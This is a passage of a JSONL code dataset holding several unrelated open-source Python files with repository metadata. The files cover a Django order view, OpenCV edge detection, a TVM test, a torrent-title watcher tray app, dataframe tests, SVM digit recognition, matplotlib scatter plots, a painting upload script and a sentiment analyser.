['exact']\n }\n\n\nclass OrderView(viewsets.ModelViewSet):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n filter_backends = [DjangoFilterBackend]\n filter_class = OrderFilterSet\n\n @action(detail=False, methods=['get'])\n def latest(self, request, pk=None):\n order = None\n user = request.user\n try:\n order = Order.objects.get(user=user.id, ordered=False)\n except ObjectDoesNotExist:\n order = Order.objects.create(user=user)\n serializer = OrderSerializer(order)\n return Response(serializer.data)\n","repo_name":"ChadMcCaulley/DjangoEcommerce","sub_path":"core/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27062935260","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file:cannys\n# Author : jiangna\n# desctription: 处理边缘化标签\n# datetime: 22-10-28 下午1:17 \n# ============================\n\nimport os\n\nimport cv2\nimport numpy as np\n\n# 1.高斯滤波去噪声\n# 
2.sobel计算梯度及角度\n# g =np.sqrt(Gx**2 + Gy**2)\n# theta = np.tan(Gy/Gx)\n# eg: P5sobel=|P5x|+|P5y|=|(p3-p2)+2(p6-p5)+(p9-p7)|+|(p7-p1)+2(p8-p2)+(p9-p3)|\n# 3.极大值抑制\n# 4.阈值滞后\n\n\nwindowname = \"OpenCV Media Player\"\ncv2.namedWindow(windowname)\n\n\ndef read_image(img, png, dest):\n filename, filespl = os.path.splitext(img)\n\n image = cv2.imread(img)\n\n # 边缘检测\n thresh = cv2.Canny(image, 32, 256)\n thresh, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n \"\"\"\n thresh: 目标图像\n contours: 轮廓本身\n hierarchy:\n \"\"\"\n save_path = f\"{dest}/{png}\"\n cv2.imwrite(save_path, thresh)\n\n # # 轮廓绘制\n # save_path = f\"{dest}/{filename}_mark{filespl}\"\n # img = cv2.drawContours(image, contours, -1, (0, 0, 255,), 3)\n # cv2.imwrite(save_path, img)\n\n\n# read_image('train_data_21_0.png', \".\")\n# cv2.waitKey()\n#\n# cv2.destroyWindow(windowname)\n\n\nbase_path = os.path.dirname(os.path.dirname(__file__))\n# label_path = f\"{base_path}/data/mszs_train256_1/val_label\"\n# edge_path = f\"{base_path}/data/mszs_train256_1/val_edge\"\n\nlabel_path = f\"{base_path}/data/archive_train256_3/val_label\"\nedge_path = f\"{base_path}/data/archive_train256_3/val_edge\"\n\nfor png in os.listdir(label_path):\n read_image(f\"{label_path}/{png}\", png, edge_path)\n","repo_name":"jiangna123/pid_net","sub_path":"utils/cannys.py","file_name":"cannys.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45559910503","text":"import tvm\nimport numpy as np\n\ndef test_local_multi_stage():\n if not tvm.module.enabled(\"opengl\"):\n return\n if not tvm.module.enabled(\"llvm\"):\n return\n\n n = tvm.var(\"n\")\n A = tvm.placeholder((n,), name='A', dtype=\"int32\")\n B = tvm.compute((n,), lambda i: A[i] + 1, name=\"B\")\n C = tvm.compute((n,), lambda i: B[i] * 2, name=\"C\")\n\n s = tvm.create_schedule(C.op)\n s[B].opengl()\n s[C].opengl()\n\n f = tvm.build(s, [A, C], \"opengl\", name=\"multi_stage\")\n\n ctx = tvm.opengl(0)\n n = 10\n a = tvm.nd.array(np.random.uniform(size=(n,)).astype(A.dtype), ctx)\n c = tvm.nd.array(np.random.uniform(size=(n,)).astype(B.dtype), ctx)\n f(a, c)\n\n np.testing.assert_allclose(c.asnumpy(), (a.asnumpy() + 1) * 2)\n\nif __name__ == \"__main__\":\n test_local_multi_stage()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/tests/webgl/test_local_multi_stage.py","file_name":"test_local_multi_stage.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"21015783051","text":"#!/usr/bin/python3.4\n__author__ = 'allen'\n\nimport requests\nimport re\nimport webbrowser\nimport functools\nimport logging\nimport sys\nfrom os import path\nfrom time import sleep\nfrom PyQt4 import QtGui\n\ndirectory = path.abspath(path.dirname(__file__))\nrefs = path.join(directory, \"refs.txt\")\ngood_icon = path.join(directory, \"goodTW.png\")\nbad_icon = path.join(directory, \"badTW.png\")\n\nlogging.basicConfig(filename=directory+'/tw.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S')\nlogging.info('Start')\n\n\ndef check_connection():\n try:\n requests.get(\"http://www.google.ru\")\n return True\n except:\n return False\n\n\ndef parse_title(ref):\n req = requests.get(ref)\n expr = re.compile('.*')\n title = expr.search(req.text).group()[7:-8]\n expr = re.compile('[^/]*/')\n name = 
expr.search(title).group()[:-1]\n expr = re.compile('\\d+\\sиз')\n if expr.search(title) is not None:\n number = expr.search(title).group()[:-3]\n else:\n expr = re.compile('\\d+\\s[(]')\n number = expr.search(title).group()[:-2]\n return [name, number]\n\n\ndef change_line(filename, cur, new):\n file = open(filename, 'r')\n text = file.read()\n file.close()\n file = open(filename, 'w')\n file.write(text.replace(cur, new))\n file.close()\n\n\nclass SystemTrayIcon(QtGui.QSystemTrayIcon):\n def __init__(self, parent=None):\n icon = QtGui.QIcon(good_icon)\n QtGui.QSystemTrayIcon.__init__(self, icon, parent)\n\n self.menu = QtGui.QMenu(parent)\n self.menu.addAction(\"Add\").triggered.connect(self.add)\n self.watchers = QtGui.QMenu(\"Watchers\", self.menu)\n self.menu.addMenu(self.watchers)\n self.menu.addAction(\"Update\").triggered.connect(self.update)\n self.menu.addAction(\"Remove\").triggered.connect(self.remove)\n self.menu.addSeparator()\n self.menu.addAction(\"Exit\").triggered.connect(QtGui.qApp.quit)\n self.setContextMenu(self.menu)\n logging.info(\"GUI initialized\")\n\n self.changing = []\n self.update()\n\n def add(self):\n file = open(refs, 'r+')\n file.read()\n text, ok = QtGui.QInputDialog.getText(QtGui.QInputDialog(), 'Add watcher', 'Enter URL:')\n if ok:\n try:\n title = parse_title(str(text))\n file.write(str(text)+'\\n')\n file.write(title[0]+\"||| \"+title[1]+'\\n')\n self.watchers.addAction(title[0]+\"||| \"+title[1])\n file.flush()\n logging.info(str(text)+\" added\")\n except requests.exceptions.MissingSchema:\n logging.warning(\"Wrong URL: \"+str(text))\n\n def update(self):\n if check_connection():\n self.changing = []\n file = open(refs, 'r')\n self.watchers.clear()\n logging.info(\"Update started...\")\n try:\n for line in file:\n if line[:4] == \"http\":\n url = line[:-1]\n new_title = parse_title(line[:-1])\n elif new_title[0]+\"||| \"+new_title[1] == line[:-1]:\n self.watchers.addAction(line[:-1]).\\\n triggered.connect(functools.partial(webbrowser.open_new_tab, url))\n elif line[0] != '\\n':\n self.setIcon(QtGui.QIcon(bad_icon))\n self.changing.append([line, new_title[0]+\"||| \"+new_title[1]+'\\n', url])\n self.watchers.addAction(line[:-1]+\" >>> \"+new_title[1]).\\\n triggered.connect(functools.partial(self.change, len(self.changing)-1))\n except:\n logging.critical(\"Wrong URL in refs.txt\")\n else:\n logging.critical(\"No connection to Internet, can't update\")\n\n def change(self, i):\n self.setIcon(QtGui.QIcon(good_icon))\n change_line(refs, self.changing[i][0], self.changing[i][1])\n webbrowser.open_new_tab(self.changing[i][2])\n sleep(0.5)\n self.update()\n\n def remove(self):\n text, ok = QtGui.QInputDialog.getText(QtGui.QInputDialog(), 'Remove watcher', 'Remove URL:')\n file = open(refs, 'r')\n if ok:\n st = ''\n flag = False\n for line in file:\n if flag:\n st = line\n flag = False\n if line == str(text)+'\\n':\n flag = True\n if st != '':\n change_line(refs, st, '')\n change_line(refs, str(text)+'\\n', '')\n logging.info(str(text)+\" removed\")\n self.update()\n\n\ndef main():\n if check_connection():\n app = QtGui.QApplication(sys.argv)\n QtGui.QApplication.setQuitOnLastWindowClosed(False)\n tray = SystemTrayIcon()\n tray.show()\n sys.exit(app.exec_())\n else:\n logging.critical(\"No connection to Internet\")\n exit()\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"IlyaGusev/TorrentWatcher","sub_path":"watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5039455960","text":"from __future__ import annotations\n\nimport pandas as pd\nimport pytest\n\nfrom tests.utils import convert_dataframe_to_pandas_numpy\nfrom tests.utils import integer_dataframe_1\nfrom tests.utils import integer_dataframe_2\nfrom tests.utils import interchange_to_pandas\n\n\ndef test_get_rows_by_mask(library: str) -> None:\n df = integer_dataframe_1(library)\n namespace = df.__dataframe_namespace__()\n mask = namespace.column_from_sequence(\n [True, False, True], dtype=namespace.Bool(), name=\"result\"\n )\n result = df.get_rows_by_mask(mask)\n result_pd = interchange_to_pandas(result, library)\n result_pd = convert_dataframe_to_pandas_numpy(result_pd)\n expected = pd.DataFrame({\"a\": [1, 3], \"b\": [4, 6]})\n pd.testing.assert_frame_equal(result_pd, expected)\n\n\ndef test_get_column_by_name_invalid_lazy() -> None:\n df1 = integer_dataframe_1(\"polars-lazy\")\n df2 = integer_dataframe_2(\"polars-lazy\")\n with pytest.raises(\n ValueError, match=\"Column was created from a different dataframe!\"\n ):\n df1.get_rows_by_mask(df2.get_column_by_name(\"a\") > 0)\n","repo_name":"MarcoGorelli/impl-dataframe-api","sub_path":"tests/dataframe/get_rows_by_mask_test.py","file_name":"get_rows_by_mask_test.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70607204087","text":"import numpy as np\r\nimport cv2,time\r\nfrom sklearn import svm\r\nfrom sklearn.datasets import fetch_openml\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import ImageGrab\r\nimport glob,csv,os\r\nfrom sklearn import svm\r\nimport pandas as pd\r\n\r\n#run it for label=\"0...9\"\r\nlabel=\"0\"\r\nimg_list=glob.glob(\"F:\\ML\\Dataset/\"+label+\"/*.png\")\r\nfor i in img_list:\r\n img=cv2.imread(i,0)\r\n gray=cv2.GaussianBlur(img,(15,15),0)\r\n roi=cv2.resize(gray,(28,28),interpolation=cv2.INTER_AREA) #region of interest\r\n X=[]\r\n X.append(label)\r\n row,col=roi.shape\r\n for x in range(row):\r\n for y in range(col):\r\n k=roi[x,y]\r\n if(k>100):\r\n k=1\r\n else: \r\n k=0\r\n X.append(k)\r\n \r\n with open(\"F:\\ML\\Dataset\\data.csv\",'a') as f: #append in binary\r\n writer=csv.writer(f)\r\n writer.writerow(X)\r\n \r\n\r\ndf=pd.read_csv(\"F:\\ML\\Dataset\\data.csv\")\r\ndf=df.sample(frac=1).reset_index(drop=True)\r\nXt=df.drop([\"1\"],axis=1)\r\nYt=df[\"1\"]\r\n\r\n#x_train,y_train=Xt[:10],Yt[:10]\r\nclf = svm.SVC()\r\nclf.fit(Xt,Yt)\r\n\r\n\r\n\r\n\r\nfor i in range(20):\r\n time.sleep(5) \r\n live_img=ImageGrab.grab(bbox=(80,80,200,200))\r\n live_img\r\n live_img.save(\"F:\\ML\"+str(i)+\".png\")\r\n # gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) -> 0 in imread\r\n img=cv2.imread(\"F:\\ML\"+str(i)+\".png\",0)\r\n img\r\n gray=cv2.GaussianBlur(img,(15,15),0)\r\n #ret,th_img=cv2.threshold(gray,100,255,cv2.THRESH_BINARY)\r\n re=cv2.resize(gray,(28,28),interpolation=cv2.INTER_AREA)\r\n #re.shape\r\n #cv2.imshow(\"live_img\",re) \r\n #cv2.waitKey(0)\r\n X=[]\r\n a=-1\r\n row,col=re.shape\r\n for x in range(row):\r\n for y in range(col):\r\n k=re[x,y]\r\n if(k>100): \r\n k=1\r\n else: \r\n k=0\r\n X.append(k)\r\n pred=clf.predict([X]) \r\n print(pred)\r\n # print(len(X))\r\n #arr=np.array(X)\r\n #len(X)\r\n #arr.shape\r\n #[X]\r\n # pred=clf.predict(x_test)\r\n 
\r\n# print(\"prediction:\"+pred[0])","repo_name":"aman4aug2011/Digit_Recognition","sub_path":"digitrecog_own.py","file_name":"digitrecog_own.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73305691124","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport httplib, urllib, mimetypes\n\ndef post_multipart(host, selector, fields, files):\n content_type, body = encode_multipart_formdata(fields, files)\n h = httplib.HTTPConnection(host)\n headers = {\n 'Content-Type': content_type\n }\n h.request('POST', selector, body, headers)\n res = h.getresponse()\n return res\n\ndef encode_multipart_formdata(fields, files):\n BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'\n CRLF = '\\r\\n'\n L = []\n for (key, value) in fields:\n L.append('--' + BOUNDARY)\n L.append('Content-Disposition: form-data; name=\"%s\"' % key)\n L.append('')\n L.append(value)\n for (key, filename, value) in files:\n L.append('--' + BOUNDARY)\n L.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, filename))\n L.append('Content-Type: %s' % get_content_type(filename))\n L.append('')\n L.append(value)\n L.append('--' + BOUNDARY + '--')\n L.append('')\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, body\n\ndef get_content_type(filename):\n return mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n\ndef cap(word_with_underscores):\n parts = word_with_underscores.split(\"_\")\n return \" \".join(map(str.capitalize, parts))\n\ndef read_tags(path):\n tag_lines = open(os.path.join(paintings_path, \"tags\")).readlines()\n tags = {}\n for line in tag_lines:\n tokens = line.split(\"=\")\n tags[tokens[0]] = str.strip(tokens[1])\n return tags\n\ndef import_paintings(paintings_path, type):\n tags = (type == \"match\" and read_tags(paintings_path)) or \"\"\n conn = httplib.HTTPConnection(\"localhost\", 7070)\n try:\n for file in os.listdir(paintings_path):\n tokens = file.split(\".\") \n if len(tokens) == 2 and tokens[1] == \"jpg\":\n artist, title = tokens[0].split(\"|\")\n img_tags = (title in tags and tags[title]) or \"\"\n artist, title = map(cap, (artist, title))\n fields = [(\"painting-artist\", artist), (\"painting-title\", title), (\"painting-strategy\", \"1\"), (\"painting-tags\", img_tags)]\n files = [(\"uploaded-file\", file, open(os.path.join(paintings_path,file), 'r').read())]\n post_multipart(\"localhost:7070\", \"/panel/upload\", fields, files)\n except:\n raise\n \nif __name__ == \"__main__\":\n type = \"all\"\n if len(sys.argv) > 1:\n type = sys.argv[1]\n paintings_path = os.path.join(\"/Users/alexis\",\"Desktop\",\"Dev\",\"TSP\",\"paintings\",type)\n import_paintings(paintings_path, type)","repo_name":"alexmic/the-switchable-painting","sub_path":"script/misc/painting_import.py","file_name":"painting_import.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"31109749812","text":"# scatterplots = great for corelation of values \n\n#________________________________________________________\n# RESOURCES\n\n# https://matplotlib.org/3.1.0/tutorials/colors/colormaps.html\n# https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html\n\n#________________________________________________________\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nplt.style.use('seaborn')\n\nx = [5, 7, 8, 5, 6, 7, 9, 2, 
3, 4, 4, 4, 2, 6, 3, 6, 8, 6, 4, 1]\ny = [7, 4, 3, 9, 1, 3, 2, 5, 2, 4, 8, 7, 1, 6, 4, 9, 7, 7, 5, 1]\n\ncolors = [7, 5, 9, 7, 5, 7, 2, 5, 3, 7, 1, 2, 8, 1, 9, 2, 5, 6, 7, 5]\n\nsizes = [209, 486, 381, 255, 191, 315, 185, 228, 174,\n 538, 239, 394, 399, 153, 273, 293, 436, 501, 397, 539]\n\ndata = pd.read_csv('/Users/User/Desktop/Python/Python_MathPlotLib/chartData/DATA_Scatter_Plot.txt')\n\ndef main() -> None:\n\n# ________________________________________________\n # print('Hello World!')\n \n # plt.scatter(x, y, s=100, c='blue', edgecolor='black', linewidth=1, alpha=0.75)\n # # marker='x' # add to above\n\n # plt.scatter(x, y, s=sizes, c=colors, cmap='Blues', edgecolor='black', linewidth=1, alpha=0.75)\n \n # cbar = plt.colorbar()\n # cbar.set_label('Satisfaction')\n\n # plt.tight_layout()\n # plt.show()\n# ________________________________________________\n\n view_count = data['view_count']\n likes = data['likes']\n ratio = data['ratio']\n\n plt.scatter(view_count, likes, c=ratio, cmap='summer', edgecolor='black', linewidth=1, alpha=0.75)\n\n plt.xscale('log') # fixes outliers\n plt.yscale('log') # fixes outliers\n \n cbar = plt.colorbar()\n cbar.set_label('Like/Dislike Ratio')\n\n plt.title('Trending YouTube Videos')\n plt.xlabel('View Count')\n plt.ylabel('Total Likes')\n\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shaun103/Python_Notes","sub_path":"Python_MathPlotLib/7_Scatter_Plots/scatter_plots.py","file_name":"scatter_plots.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7135643843","text":"import numpy as np\nimport spacy\nimport argparse\nimport csv\nimport datetime as tm\nfrom pathlib import Path\nimport yaml\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom textblob import TextBlob\nimport os\n\ndir = str(Path(__file__).parents[0])\ntrain_parsing_instructions = {'beginning': [2],\n 'body': [3, 4],\n 'climax': [5],\n 'ending': [6]}\neval_parsing_instructions = {'beginning': [1],\n 'body': [2, 3],\n 'climax': [4],\n 'ending1': [5],\n 'ending2': [6]}\ntest_parsing_instructions = {'beginning': [0],\n 'body' : [1,2],\n 'climax': [3],\n 'ending1': [4],\n 'ending2': [5]\n }\nstory_struct={'beginning': 0,\n 'body': 1,\n 'climax': 2,\n 'ending': 3,\n 'context': 'sum'}\ndefault_probas = [{'posterior': 'ending', 'prior': ['climax', 'body', 'beginning']},\n {'posterior': 'ending', 'prior': ['climax', 'body']},\n {'posterior': 'ending', 'prior': 'climax'},\n {'posterior': 'ending', 'prior': 'context'}]\nvader_pos = .05\nvader_neg = -.05\nblob_pos = .1\nblob_neg = -.1\n\ndefault_sent = {'method': 'average'}\n\ndef load_stories(filename, parsing_instructions, header=True):\n \"\"\"\n Load the stories from filename and sort them in three\n dimensions: the 4 first concatenated sentences, the\n first proposition and the second option.\n \"\"\"\n if(not Path(filename).exists()):\n raise Exception(filename + \" cannot be found. 
Aborting.\")\n stories = []\n with open(filename, 'r') as csvfile:\n if header:\n csvfile.readline()\n\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n segmented_story = []\n for _, sentences in parsing_instructions.items():\n seg = ''\n for sentence in sentences:\n seg = seg + row[sentence] + ' '\n\n segmented_story = segmented_story + [seg]\n stories.append(segmented_story)\n\n return stories\n\nclass SentimentAnalyzer:\n '''\n Class to perform sentiment analysis on a given dataset.\n Required arguments for init:\n -sentiment_files_path_dict: this dict lists the paths to the different lexicons to load\n as sentiments references. For the moment this is hard coded into\n positive, negative and mpqa.\n Attributes\n -probas_wanted:\n list of probabilities to compute. Default is hard coded list from paper.\n Has to be coded as list of dicts, where each dict is contains at least the key 'posterior'.\n If it has also a 'prior', the latter should be either a list if the prior is a joint prior,\n or simply a value.\n Values are 'strings' that can be found in story_struct such as \"ending\", \"beginning\", etc.\n -sent_traj_counts_array:\n array containing the counts of each sentiment trajectory encountered in training.\n The first columns correspond to the corresponding sentiment of the part of the story,\n last column indicates the number of occurences of this trajectory.\n -sent_condensed_traj_counts_array:\n same as above but with condensed stories (= all context is evaluated at once).\n -save_traj_path:\n path to save the sent_counts\n '''\n\n def __init__(self, sentiment_files_path_dict=None,\n probas_wanted=default_probas,\n sent_traj_counts_path=' ',\n save_traj=True,\n save_traj_path=None,\n force_retrain=False,\n sent_method=default_sent,\n vader_pos_threshold=.05,\n vader_neg_threshold=-.05, **kwargs):\n ''' Note: positive_words & negative words are lists of strings, mpqa_dicts is a list of dict'''\n try:\n self.nlp = spacy.load('en_core_web_sm')\n except OSError:\n print('ERROR: did you install the spacy language model on your computer?' \\\n ' If not do it using eg. : python -m spacy download en_core_web_sm')\n print('INFO: Loading sentiment lists ...')\n self.positive_words, self.negative_words, self.mpqa_dicts \\\n = self.load_sentiment_lexica(sentiment_files_path_dict)\n print('INFO: Done.')\n\n self.sent_traj_counts_dict = {}\n self.sent_condensed_traj_counts_dict = {}\n self.sent_traj_counts_array = None\n self.sent_condensed_traj_counts_array = None\n self.sent_traj_counts_path = dir + sent_traj_counts_path\n self.save_traj = save_traj\n self.save_traj_path = dir + save_traj_path\n self.probas_wanted = probas_wanted\n self.combination_of_methods = sent_method['method']\n self.force_retrain = force_retrain\n\n self.sent_method = sent_method['method']\n\n self.pos_threshold = sent_method.get('pos_threshold',\n vader_pos if sent_method['method'] == 'vader'\n else blob_pos if sent_method['method'] == 'blobtext'\n else 0.001)\n self.neg_threshold = sent_method.get('neg_threshold',\n vader_neg if sent_method['method'] == 'vader'\n else blob_neg if sent_method['method'] == 'blobtext'\n else -0.001)\n\n if save_traj and save_traj_path is None:\n print('ERROR: did not specify saving directory for sentiment traj. 
They will not be saved')\n self.save_traj = False\n\n def load_sentiment_lexica(self, path_dict):\n positives = self.read_wordlist(path_dict['positive'])\n negatives = self.read_wordlist(path_dict['negative'])\n mpqas = self.read_mpqa(path_dict['mpqa'])\n return positives, negatives, mpqas\n\n def read_wordlist(self, path):\n with open(dir + path, mode='r') as wordlist_file:\n wordlist = []\n for line in wordlist_file:\n if line.startswith(';') or line.startswith('\\n'):\n pass\n else:\n wordlist.append(line[0:-1])\n\n if wordlist == []:\n print('WARNING : could not parse {}. No words retrieved.'.format(path))\n\n return wordlist\n\n def read_mpqa(self, path):\n with open(dir + path, mode='r') as file:\n wordlist = []\n for line in file:\n if line.startswith(';') or line.startswith('\\n'):\n pass\n else:\n splited = line.split(' ')\n dict = {}\n for arg in splited:\n key, value = arg.split('=')\n if value.endswith('\\n'):\n value = value[:-1]\n dict[key] = value\n wordlist.append(dict)\n\n return wordlist\n\n def story2sent(self, story, combination_of_methods=None, return_normalized=True, **kwargs):\n story_sent = []\n vader_sent = []\n blobtext_sent = []\n if combination_of_methods == None:\n combination_of_methods = self.combination_of_methods\n\n if self.sent_method == 'vader':\n analyzer = SentimentIntensityAnalyzer()\n for seg in story:\n vader_sent.append(analyzer.polarity_scores(seg)['compound'])\n return self.categorize(vader_sent,\n self.pos_threshold,\n self.neg_threshold) if return_normalized else vader_sent\n elif self.sent_method == 'blobtext':\n for seg in story:\n blobtext_sent.append(TextBlob(seg).sentiment.polarity)\n return self.categorize(blobtext_sent,\n self.pos_threshold,\n self.neg_threshold) if return_normalized else blobtext_sent\n\n else:\n for seg in story:\n pos, neg, pos_mpqa, neg_mpqa = 0, 0, 0, 0\n seg_parsed = self.nlp(seg)\n for sentence in seg_parsed.sents:\n for token in sentence:\n if token.pos_ in ['ADP', 'AUX', 'DET', 'NUM', 'PRON',\n 'PROPN', 'PUNCT', 'SCONJ', 'SYM', 'SPACE']:\n continue\n negated = self.is_negated(token)\n if token.lemma_ in self.positive_words:\n if negated:\n neg = neg + 1\n else:\n pos = pos + 1\n if token.lemma_ in self.negative_words:\n if negated:\n pos = pos + 1\n else:\n neg = neg + 1\n\n # search if in mpqa list\n if kwargs.get('lock_pos', False):\n mpqa_dict = next((dict for dict in self.mpqa_dicts\n if (dict['word1'] == token.lemma_\n and (dict['pos1'] == 'anypos' or\n dict['pos1'] == self.transl(token.pos_)))), None)\n else:\n mpqa_dict = next((dict for dict in self.mpqa_dicts if dict['word1'] == token.lemma_), \\\n None)\n if mpqa_dict is not None:\n if mpqa_dict['priorpolarity'] == 'positive':\n if negated:\n neg_mpqa = neg_mpqa + 1\n else:\n pos_mpqa = pos_mpqa + 1\n if mpqa_dict['priorpolarity'] == 'negative':\n if negated:\n pos_mpqa = pos_mpqa + 1\n else:\n neg_mpqa = neg_mpqa + 1\n\n seg_sent = pos - neg\n seg_sent_mpqa = pos_mpqa - neg_mpqa\n story_sent.append([seg_sent, seg_sent_mpqa])\n story_sent = self.combine_sentiment_methods(story_sent, combination_of_methods,\n return_normalized=return_normalized)\n #print('story sent: {}' .format(story_sent))\n print('vader: {}'.format(vader_sent))\n return story_sent\n\n def categorize(self, array, pos_threshold, neg_threshold):\n return list(map(int, [1 if sent > pos_threshold else -1 if sent < neg_threshold else 0 for sent in array]))\n\n\n def is_negated(self, token):\n negated_token = False\n if 'neg' in [child.dep_ for child in token.children]:\n negated_token = 
True\n return negated_token\n\n\n def transl(self, pos):\n pos_name = {\n 'ADV': 'adverb',\n 'VERB': 'verb',\n 'NOUN': 'noun',\n 'ADJ': 'adj'\n }\n return pos_name.get(pos, 'else')\n\n\n def combine_sentiment_methods(self, story_sent, combination='average', return_normalized=True):\n story_sent = np.asarray(story_sent)\n if combination == 'average':\n story_sent = np.sum(story_sent, axis=1)\n if combination == 'binglui':\n story_sent = np.sign(story_sent[:,0])\n if combination == 'mpqa':\n story_sent = np.sign(story_sent[:, 1])\n if return_normalized:\n return np.sign(story_sent)\n else:\n return story_sent\n\n def sent_traj_to_str(self, sent):\n return \" \".join(str(x) for x in sent)\n\n def train(self, train_stories_list, **kwargs):\n '''\n This function trains a sentiment_analyzer either by loading precomputed counts arrays\n or on given training story list.\n If a saving path has been specified, it will automatically save the counts arrays for next time.\n\n :param train_stories_list:\n list of training stories\n :return:\n '''\n if Path(self.sent_traj_counts_path).exists() and not self.force_retrain:\n print(\"INFO: found file with sentiment trajectories counts in {}.\" \\\n \" Loading array from file instead of training.\" \\\n .format(self.sent_traj_counts_path))\n with np.load(self.sent_traj_counts_path) as data:\n self.sent_traj_counts_array = data['sent_traj_counts_array']\n self.sent_condensed_traj_counts_array = data['sent_condensed_traj_counts_array']\n else:\n print(\"INFO: Did not find file with pretrained sentiment trajectories.\" \\\n \"Training ngram model on {} stories\" .format(len(train_stories_list)))\n i = 0\n for train_story in train_stories_list:\n i = i + 1\n if i % 50 == 0:\n print(\"INFO: Processing story {}\".format(i))\n sentiment = self.story2sent(train_story, **kwargs)\n #print(train_story)\n sentiment_condensed = self.story2sent(train_story, return_normalized=False, **kwargs)\n sentiment_condensed = np.sign([np.sum(sentiment_condensed[0:story_struct['ending']]),\n sentiment[story_struct['ending']]])\n #not condensed\n if self.sent_traj_to_str(sentiment) in self.sent_traj_counts_dict:\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] = \\\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] + 1\n else:\n self.sent_traj_counts_dict[self.sent_traj_to_str(sentiment)] = 1\n\n #condensed\n if self.sent_traj_to_str(sentiment_condensed) in self.sent_condensed_traj_counts_dict:\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] = \\\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] + 1\n else:\n self.sent_condensed_traj_counts_dict[self.sent_traj_to_str(sentiment_condensed)] = 1\n i = 0\n #not condensed\n for traj, val in self.sent_traj_counts_dict.items():\n row = np.concatenate((np.fromstring(traj, dtype=np.int, sep=' '),\n np.array([val])))\n if i == 0:\n self.sent_traj_counts_array = row\n else:\n self.sent_traj_counts_array = np.vstack((self.sent_traj_counts_array,\n row))\n i = i + 1\n\n #condensed\n i = 0\n for traj, val in self.sent_condensed_traj_counts_dict.items():\n row = np.concatenate((np.fromstring(traj, dtype=np.float, sep=' '),\n np.array([val])))\n if i == 0:\n self.sent_condensed_traj_counts_array = row.astype(np.int)\n else:\n self.sent_condensed_traj_counts_array= np.vstack((self.sent_condensed_traj_counts_array,\n row.astype(np.int)))\n i = i + 1\n\n if self.save_traj:\n try:\n np.savez_compressed(self.save_traj_path ,\n 
sent_traj_counts_array=self.sent_traj_counts_array,\n sent_condensed_traj_counts_array=self.sent_condensed_traj_counts_array)\n except FileNotFoundError:\n f = open(self.save_traj_path , 'w')\n f.close()\n\n def predict_proba(self, eval_stories_list, probas_wanted=None, predict_neutral=False, **kwargs):\n '''\n This function predicts probabilities\n :param eval_stories_list:\n :param probas_wanted:\n :return:\n '''\n #note: two last columns have to be \"ending 1 and ending2\"\n if probas_wanted == None:\n probas_wanted = self.probas_wanted\n print(\"INFO: Model predicting the following probabilities: {}\".format(probas_wanted))\n\n if self.sent_traj_counts_array is None:\n raise Exception(\"Model not trained. Please train model first.\")\n proba_features = []\n\n if not predict_neutral:\n print(\"Removing neutral endings...\" , end='')\n self.sent_condensed_traj_counts_array = \\\n self.sent_condensed_traj_counts_array[self.sent_condensed_traj_counts_array[:, 1] != 0]\n self.sent_traj_counts_array = \\\n self.sent_traj_counts_array[self.sent_traj_counts_array[:, story_struct['ending']] != 0]\n print(\"Done.\")\n\n i = 0\n for story in eval_stories_list:\n if i % 50 == 0:\n print(\"Predicting story {}/{}\".format(i, len(eval_stories_list)))\n i += 1\n\n story_sent = self.story2sent(story, return_normalized=False)\n print(story)\n print(story_sent)\n #make sure the two endings are in story_sent: note: normally 4 dims in array but + counts = 5\n assert len(story_sent) == self.sent_traj_counts_array.shape[1]\n\n for ending in [len(story_sent) - 1, len(story_sent) - 2]:\n story_proba_features = []\n # if ending is neutral, send 0 proba back (?!)\n\n masked_sent_story = np.asarray([x for i, x in enumerate(story_sent) if i != ending])\n for proba in probas_wanted:\n if 'prior' in proba:\n if isinstance(proba['prior'], list):\n proba_val = self.calc_proba_prior(np.sign(masked_sent_story),\n 